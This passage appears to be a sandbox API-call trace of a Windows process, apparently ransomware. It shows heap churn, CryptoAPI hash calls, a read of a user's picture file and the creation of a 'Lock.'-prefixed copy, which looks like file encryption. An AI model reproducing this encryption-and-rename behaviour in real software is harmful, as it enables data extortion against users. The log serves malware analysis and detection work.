(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0253.930] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0253.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.930] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0253.930] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0253.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0253.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e698c8 [0253.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0253.931] CryptDestroyHash (hHash=0xa87250) returned 1 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0253.931] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0253.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0253.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0253.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0253.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0253.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.933] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0253.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0254.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0254.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0254.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0254.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0254.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0254.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0254.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0254.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0254.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0254.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0254.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0254.003] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0254.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0254.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0254.004] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0254.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0254.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0254.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0254.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0254.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0254.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/TbPkae.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\tbpkae.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0254.005] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0254.005] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0254.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0254.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0254.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0254.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0254.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0254.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0254.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0254.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0254.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0254.007] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0254.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0254.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0254.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0254.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0254.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0254.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.TbPkae.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.tbpkae.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0254.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0254.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0254.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0254.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0254.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0254.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0254.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0254.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 